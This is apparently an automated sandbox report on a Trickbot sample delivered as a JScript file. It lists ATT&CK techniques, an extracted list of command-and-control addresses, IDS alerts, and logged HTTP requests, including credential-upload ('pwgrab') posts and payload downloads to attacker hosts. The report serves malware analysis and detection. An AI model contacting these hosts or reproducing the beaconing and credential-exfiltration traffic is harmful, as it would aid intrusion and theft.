Play interactive tour

Edit tour

Analysis Report Monet.jse

Overview

General Information

Joe Sandbox Version:	28.0.0
Analysis ID:	93925
Start date:	20.01.2020
Start time:	14:10:45
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 18m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Monet.jse
Cookbook file name:	default.jbs
Analysis system description:	computer Native physical Machine for testing VM-aware malware (Office 2010 v14.0.6029, Java 1.8.0_65, Flash 20.0.0.267, Acrobat Reader 11.0.18, Internet Explorer 11, Chrome 55, Firefox 47)
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) GSI enabled (Javascript) GSI enabled (Java) AMSI enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.spyw.evad.winJSE@20/7@4/8
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 125 Number of non-executed functions: 118
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .jse
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, igfxsrvc.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 8.248.119.254, 8.253.95.121, 8.248.129.254, 8.248.141.254, 8.248.131.254, 67.26.81.254, 8.253.95.120, 67.26.83.254, 8.253.95.249, 8.253.95.98, 8.248.121.254, 67.26.75.254, 8.253.207.108, 67.26.73.254, 8.248.125.254, 93.184.221.240, 205.185.216.10, 205.185.216.42 Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, au.download.windowsupdate.com.hwcdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, auto.au.download.windowsupdate.com.c.footprint.net, wu.wpc.apr-52dd2.edgecastdns.net, wu.azureedge.net Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtWriteVirtualMemory calls found.

Detection

Strategy	Score	Range	Reporting	Whitelisted	Threat	Detection
Threshold	100	0 - 100	Report FP / FN	false	Trickbot

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")

Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation21	Valid Accounts1	Valid Accounts1	Disabling Security Tools1	Credential Dumping2	System Time Discovery2	Remote File Copy3	Data from Local System1	Data Encrypted1	Uncommonly Used Port11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Replication Through Removable Media	Scripting21	Application Shimming1	Access Token Manipulation11	Deobfuscate/Decode Files or Information1	Credentials in Files1	Security Software Discovery5	Remote Services	Data from Removable Media	Exfiltration Over Other Network Medium	Remote File Copy3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
External Remote Services	Execution through API131	Accessibility Features	Process Injection32	Scripting21	Input Capture	File and Directory Discovery4	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Standard Cryptographic Protocol21	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Drive-by Compromise	Exploitation for Client Execution1	System Firmware	Application Shimming1	File Deletion1	Credentials in Files	System Information Discovery35	Logon Scripts	Input Capture	Data Encrypted	Standard Non-Application Layer Protocol3	SIM Card Swap		Premium SMS Toll Fraud
Exploit Public-Facing Application	Command-Line Interface2	Shortcut Modification	File System Permissions Weakness	Obfuscated Files or Information2	Account Manipulation	Query Registry1	Shared Webroot	Data Staged	Scheduled Transfer	Standard Application Layer Protocol14	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Spearphishing Link	Graphical User Interface	Modify Existing Service	New Service	Masquerading1	Brute Force	Virtualization/Sandbox Evasion3	Third-party Software	Screen Capture	Data Transfer Size Limits	Commonly Used Port	Jamming or Denial of Service		Abuse Accessibility Features
Spearphishing Attachment	Scripting	Path Interception	Scheduled Task	Valid Accounts1	Two-Factor Authentication Interception	Process Discovery3	Pass the Hash	Email Collection	Exfiltration Over Command and Control Channel	Uncommonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Spearphishing via Service	Third-party Software	Logon Scripts	Process Injection	Modify Registry1	Bash History	Application Window Discovery11	Remote Desktop Protocol	Clipboard Data	Exfiltration Over Alternative Protocol	Standard Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Supply Chain Compromise	Rundll32	DLL Search Order Hijacking	Service Registry Permissions Weakness	Virtualization/Sandbox Evasion3	Input Prompt	Remote System Discovery1	Windows Admin Shares	Automated Collection	Exfiltration Over Physical Medium	Multilayer Encryption	Rogue Cellular Base Station		Data Destruction
Trusted Relationship	PowerShell	Change Default File Association	Exploitation for Privilege Escalation	Access Token Manipulation11	Keychain	System Network Configuration Discovery11	Taint Shared Content	Audio Capture	Commonly Used Port	Connection Proxy			Data Encrypted for Impact
Hardware Additions	Execution through API	File System Permissions Weakness	Valid Accounts	Process Injection32	Private Keys	Security Software Discovery	Replication Through Removable Media	Video Capture	Standard Application Layer Protocol	Communication Through Removable Media			Disk Structure Wipe
Masquerade as Legitimate Application	Regsvr32	New Service	Bypass User Account Control	DLL Side-Loading1	Securityd Memory	Permission Groups Discovery	Pass the Ticket	Man in the Browser	Alternate Network Mediums	Custom Command and Control Protocol			Disk Content Wipe

Signature Overview

Click to jump to signature section

AV Detection:

Found malware configuration

Show sources

Source: svchost.exe.284.18.memstr

Malware Configuration Extractor: Trickbot {"C2 list": ["181.196.207.202:449", "82.146.62.520:443", "8.91.10.8:443", "129.134.18.23:449", "186.232.91.240:449", "5.182.210.226:443", "85.204.116.128:443", "185.62.188.34:443", "79.143.31.246:443", "93.189.46.122:443", "31.184.254.50:443", "195.123.217.226:443", "185.99.2.117:443", "104.168.96.113:443", "188.165.62.36:443", "5.182.210.246:443", "185.142.99.8:443", "185.252.144.135:443", "82.146.62.52:443", "212.109.220.111:443", "91.235.129.25:443", "5.182.210.109:443", "190.214.13.2:449", "181.140.173.186:449", "181.129.104.139:449", "181.113.28.146:449", "181.112.157.42:449", "170.84.78.224:449", "200.21.51.38:449", "46.174.235.36:449", "36.89.85.103:449", "181.129.134.18:449", "186.71.150.23:449", "131.161.253.190:449", "200.127.121.99:449", "114.8.133.71:449", "119.252.165.75:449", "121.100.19.18:449", "202.29.215.114:449", "180.180.216.177:449", "171.100.142.238:449"], "modules": ["networkDll", "pwgrab", "mcconf", "systeminfo"]}

Yara detected Trickbot

Show sources

Source: Yara match	File source: 00000012.00000002.56178609261.00000000003A7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 284, type: MEMORY

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Show sources

Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00065980 CryptAcquireContextW,	14_2_00065980
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00065980 CryptAcquireContextW,	18_2_00065980
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_0007C2F0 CryptAcquireContextW,	18_2_0007C2F0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00065980 CryptAcquireContextW,	21_2_00065980
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_0007C2F0 CryptAcquireContextW,	21_2_0007C2F0
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018008E1F4 CryptUnprotectData,wnsprintfA,wnsprintfA,	36_2_000000018008E1F4
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180096408 CryptUnprotectData,LocalFree,	36_2_0000000180096408
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018008C580 CryptUnprotectData,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	36_2_000000018008C580
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800966D0 RegQueryValueExW,VirtualAlloc,RegQueryValueExW,VirtualFree,lstrlenW,CryptUnprotectData,LocalFree,VirtualFree,	36_2_00000001800966D0
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800968A0 StrCpyNW,StrCatW,lstrlenW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,wnsprintfW,StrCmpW,	36_2_00000001800968A0
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018008D428 CryptUnprotectData,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	36_2_000000018008D428
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180093798 CryptUnprotectData,	36_2_0000000180093798
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018009790C CryptUnprotectData,LocalFree,_invalid_parameter_noinfo_noreturn,	36_2_000000018009790C

Spreading:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00061180 FindFirstFileW,FindNextFileW,FindClose,	14_2_00061180
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_0006BD80 FindFirstFileW,FindNextFileW,	18_2_0006BD80
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00061180 FindFirstFileW,FindNextFileW,FindClose,	18_2_00061180
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_000782C0 FindFirstFileW,FindNextFileW,	18_2_000782C0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00061180 FindFirstFileW,FindNextFileW,FindClose,	21_2_00061180

Enumerates the file system

Show sources

Source: C:\Windows\System32\svchost.exe	File opened: C:\Windows\system32\config\systemprofile\AppData\Roaming\Intel\Wireless\	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File opened: C:\Windows\system32\config\systemprofile\AppData\Roaming\	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File opened: C:\Windows\system32\taskschd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File opened: C:\Windows\system32\config\systemprofile\AppData\Roaming\Intel\Wireless\CrashDumps\	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File opened: C:\Windows\system32\bcryptprimitives.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File opened: C:\Windows\system32\config\systemprofile\AppData\Roaming\Intel\	Jump to behavior

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.0.40:49187 -> 181.129.104.139:449
Source: Traffic	Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.0.40:49189 -> 5.2.78.43:443
Source: Traffic	Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 185.62.189.249:447 -> 192.168.0.40:49193
Source: Traffic	Snort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 192.168.0.40:49203 -> 203.176.135.102:8082

May check the online IP address of the machine

Show sources

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49203 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49203

Detected TCP or UDP traffic on non-standard ports

Show sources

Source: global traffic	TCP traffic: 192.168.0.40:49187 -> 181.129.104.139:449
Source: global traffic	TCP traffic: 192.168.0.40:49193 -> 185.62.189.249:447
Source: global traffic	TCP traffic: 192.168.0.40:49203 -> 203.176.135.102:8082

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic	HTTP traffic detected: GET /21RWq/jucE4.php?zs=s20&ed=431846743&rnx=4723711 HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.10.3945.88 Safari/537.36Accept-Language: de-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.195.237.14Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/83/ HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=---------CVWRWQYCSROXPZEUConnection: CloseUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)Host: 203.176.135.102:8082Content-Length: 301Cache-Control: no-cache

Connects to IPs without corresponding DNS lookups

Show sources

Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14
Source: unknown	TCP traffic detected without corresponding DNS query: 185.195.237.14

Contains functionality to download additional files from the internet

Show sources

Source: C:\Windows\System32\svchost.exe

Code function: 36_2_00000001800796DC InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,GetLastError,InternetQueryOptionA,GetLastError,InternetSetOptionA,GetLastError,HttpSendRequestExA,GetLastError,InternetWriteFile,GetLastError,HttpEndRequestA,GetLastError,StrToIntExA,StrToIntExA,StrToIntExA,StrToIntExA,InternetQueryDataAvailable,InternetReadFile,InternetQueryDataAvailable,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,InternetCrackUrlA,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

36_2_00000001800796DC

Downloads files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SBAZIX4A\Bx6ECqoJ2[1].txt

Jump to behavior

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /?format=text HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.67.0Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/5/spk/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.67.0Host: 5.2.78.43
Source: global traffic	HTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/0/Windows%207%20x64%20SP1/1083/84.17.52.62/217C05512A13BF0D1975043DC440D43A0AD4D5BF9D7809375E0491B975D5B4A3/nfYREqCrC5seZ7lm5k4Fqwmud/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.67.0Host: 5.2.78.43
Source: global traffic	HTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/14/user/SYSTEM/0/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.67.0Host: 5.2.78.43
Source: global traffic	HTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.67.0Host: 5.2.78.43
Source: global traffic	HTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/5/dpost/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.67.0Host: 5.2.78.43
Source: global traffic	HTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/10/62/GDFUKAPEGYZAQTQ/1/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.67.0Host: 5.2.78.43
Source: global traffic	HTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/1/P9VEk5oK3B7qmh1wSz/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.67.0Host: 5.2.78.43
Source: global traffic	HTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/5/dpost/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.67.0Host: 5.2.78.43
Source: global traffic	HTTP traffic detected: GET /21RWq/jucE4.php?zs=s20&ed=431846743&rnx=4723711 HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.10.3945.88 Safari/537.36Accept-Language: de-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.195.237.14Connection: Keep-Alive

Found strings which match to known social media urls

Show sources

Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: api.ipify.org

Posts data to webserver

Show sources

Source: unknown

HTTP traffic detected: POST /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/VERS/browser/ HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=------Boundary019ABD5DUser-Agent: curl/7.67.0Content-Length: 141Host: 5.2.78.43

Urls found in memory or binary data

Show sources

Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://103.84.238.3:80
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://103.94.122.254:8082
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://103.94.122.254:8082lt
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://112.78.164.34:8082
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://112.78.164.34:8082Vault
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://164.68.96.155:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://164.68.96.155:443m
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://170.238.117.187:8082
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://170.238.117.187:8082ault
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://177.74.232.124:80
Source: wscript.exe, 00000000.00000002.55142443043.0000000002306000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.55143016342.0000000003E80000.00000004.00000001.sdmp	String found in binary or memory: http://185.195.237.14/21RWq/jucE4.php?zs=s20&ed=431846743&rnx=4723711
Source: wscript.exe, 00000000.00000002.55143060181.0000000003EA6000.00000004.00000001.sdmp	String found in binary or memory: http://185.195.237.14/21RWq/jucE4.php?zs=s20&ed=431846743&rnx=4723711bin
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://185.99.2.137:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://185.99.2.185:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://188.165.62.29:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://188.165.62.2:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://190.100.16.210:8082
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://190.119.180.226:8082
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://195.123.216.95:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://195.123.219.93:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://195.123.219.93:443x
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://203.176.135.102:8082
Source: svchost.exe, 00000024.00000002.56181457184.0000000000269000.00000004.00000020.sdmp	String found in binary or memory: http://203.176.135.102:8082/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/83/
Source: svchost.exe, 00000024.00000002.56181457184.0000000000269000.00000004.00000020.sdmp	String found in binary or memory: http://203.176.135.102:8082/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/83/-4B97C760B13D
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://203.176.135.102:8082ault
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://36.89.10
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://36.89.106.69:80
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://5.2.64.188:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://5.2.78.191:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://51.89.115.110:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://96.9.73.73:80
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://96.9.77.142:80
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp	String found in binary or memory: http://96.:80
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: svchost.exe, 00000012.00000002.56178566267.000000000037E000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabV
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.caby
Source: svchost.exe, 00000012.00000002.56178609261.00000000003A7000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en1)
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: Login Data.bak.36.dr	String found in binary or memory: http://www.google.com/favicon.ico
Source: svchost.exe, 00000012.00000002.56180117106.0000000002148000.00000004.00000001.sdmp	String found in binary or memory: https://185.62.189.249:447/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/5/pwgrab64/
Source: svchost.exe, 00000012.00000003.56114318007.00000000003F7000.00000004.00000001.sdmp	String found in binary or memory: https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/5/dpost/
